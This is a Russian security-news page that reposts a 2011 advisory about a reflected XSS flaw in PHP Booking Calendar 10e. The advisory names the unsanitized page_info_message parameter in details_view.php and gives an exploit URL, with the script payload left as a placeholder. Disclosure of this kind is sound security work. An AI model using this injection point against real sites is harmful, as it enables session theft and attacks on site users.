Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Novell Sentinel Log Manager <=1.2.0.1 Path Traversal

  appRain CMF v0.1.5 - Multiple Web Vulnerabilities

  SASHA v0.2.0 Mutiple XSS

  [SECURITY] [DSA 2365-1] dtc security update

From:tom <tom_(at)_g13net.com>
Date:26 декабря 2011 г.
Subject:PHP Booking Calendar 10e XSS

# Exploit Title: PHP Booking Calendar 10e XSS
# Date: 12/16/11
# Author: G13
# Software Link: http://sourceforge.net/projects/bookingcalendar/
# Version: 10e
# Category: webapps (php)
#

##### Vulnerability #####

The page_info_message varibale in the details_view.php does not
sanitize input.  This is a relective XSS attack.

##### Exploit #####

http://127.0.0.1/cal/details_view.php?event_id=1&date=2011-12-01&view=mon
th&loc=loc1&page_info_message=
[XSS]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород